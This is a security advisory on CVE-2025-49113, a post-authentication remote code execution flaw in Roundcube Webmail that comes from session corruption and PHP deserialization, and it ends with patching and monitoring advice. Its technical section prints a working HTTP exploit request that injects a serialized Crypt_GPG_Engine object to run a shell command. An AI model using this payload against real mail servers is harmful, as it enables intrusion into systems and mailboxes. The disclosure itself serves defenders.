84,000+ Roundcube Webmail Installations Exposed to RCE Vulnerabilities

Recent security disclosures have revealed that Roundcube Webmail, the world’s most widely deployed open-source webmail client, is under siege from a critical post-authentication remote code execution (RCE) vulnerability, tracked as CVE-2025-49113.

Security specialists estimate that over 84,000 vulnerable instances remain unpatched worldwide as of early June 2025. This figure highlights the urgent need for organizations from ISPs to government agencies and educational institutions to patch their installations.

CVE-2025-49113 exploits flaws in session handling and PHP object deserialization in Roundcube versions 1.1.0 through 1.5.9 and 1.6.x through 1.6.10, affecting millions of users globally.

These vulnerable versions are bundled by major hosting providers such as Hostinger, GoDaddy, Dreamhost, OVH, and Gandi, as well as popular control panels like cPanel, Plesk, and DirectAdmin.

With active exploitation already observed including in underground markets this vulnerability presents a clear and present danger. The fact that state actors are suspected to be leveraging this flaw for targeted attacks only adds to the gravity of the situation.

Technical Analysis

Session Handling and PHP Object Deserialization

Roundcube uses a custom session handler that stores state data in a variety of backends, including MySQL, PostgreSQL, Redis, and Memcached. The session storage format is largely based on PHP’s native serialization with a few twists. Each session is processed via a helper method, unserialize(), in ./program/lib/Roundcube/rcube_session.php.

Session Corruption and Injection

Vulnerability researchers discovered that a subtle flaw in the session handler’s logic—specifically, the improper handling of keys beginning with an exclamation mark (!)—allowed attackers to corrupt session data. By manipulating the session key in combination with user-provided data (like file uploads), an attacker could inject arbitrary data into the session.

Consider the following example of session data structure:

texttemp|b:1;language|s:5:"en_US";task|s:5:"login";...

If a session key includes a !, such as !temp, the session handler fails to properly parse the data, leading to session corruption:

text!temp|b:1;language|s:5:"en_US";...

This results in the following corrupted output during session unserialization:

texta:...{s:4:"temp";N;s:10:"1;language";s:5:"en_US";...}

Notice how the key "1;language" appears, breaking the intended session structure and enabling further exploitation.

Weaponizing the Vulnerability: RCE via Upload

The primary attack vector involves the Roundcube settings upload handler (./program/actions/settings/upload.php), where the $_GET['_from'] parameter is insufficiently sanitized. By uploading a file and manipulating the _from parameter and file name, an attacker can inject arbitrary data into the session.

Here’s an example of a manipulated file upload request:

textPOST /?_from=edit-!";i:0;O:16:"Crypt_GPG_Engine":1:{S:26:"\00Crypt_GPG_Engine\00_gpgconf";S:18:"touch+/tmp/pwned;#";}i:0;b:0;}";}}&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload HTTP/1.1
Host: roundcube.local
X-Requested-With: XMLHttpRequest
Accept-Encoding: identity
Content-Length: 242

-----------------------------WebKitFormBoundary
Content-Disposition: form-data; name="_file[]"; filename="x|b:0;preferences_time|b:0;preferences|s:179:\"a:3:{i:0;s:57:\".png"
Content-Type: image/png

IMAGE
-----------------------------WebKitFormBoundary--

This payload injects a serialized object into the session, which is eventually deserialized, leading to remote code execution via the Crypt_GPG_Engine class from the PEAR library included with Roundcube.

Key Points:

• Post-Authentication: The attacker must be authenticated (valid username/password required).
• No WAF Detection: The exploit is not detectable by standard web application firewalls.
• Widespread Impact: Affects all default installations and bundled versions by major providers.

Mitigation and Recommendations

Patched Versions:

• Roundcube 1.6.11 (latest stable)
• Roundcube 1.5.10 (LTS)

Urgent Actions for Organizations:

1. Immediate Patching: Upgrade all Roundcube installations to the latest patched versions.
2. Monitor for Exploit Attempts: Watch for unusual file uploads, session anomalies, and RCE indicators.
3. Vendor Coordination: Hosting providers and control panel vendors should prioritize patch deployment and customer notification.
4. Security Awareness: Educate users about phishing and credential theft, as the exploit requires valid credentials.

Message to Security Teams and Researchers:
This vulnerability underscores the need for rapid response when threat landscapes shift. When exploit details are public and weaponized, defenders must have access to clear, accurate, and actionable information as is the case here.

The ongoing exploitation of CVE-2025-49113 is a stark reminder of the risks inherent in widely deployed, open-source software. With over 84,000 vulnerable webmail servers at risk, immediate action is critical to prevent further compromise. Organizations must prioritize patch management and remain vigilant in monitoring for emerging threats.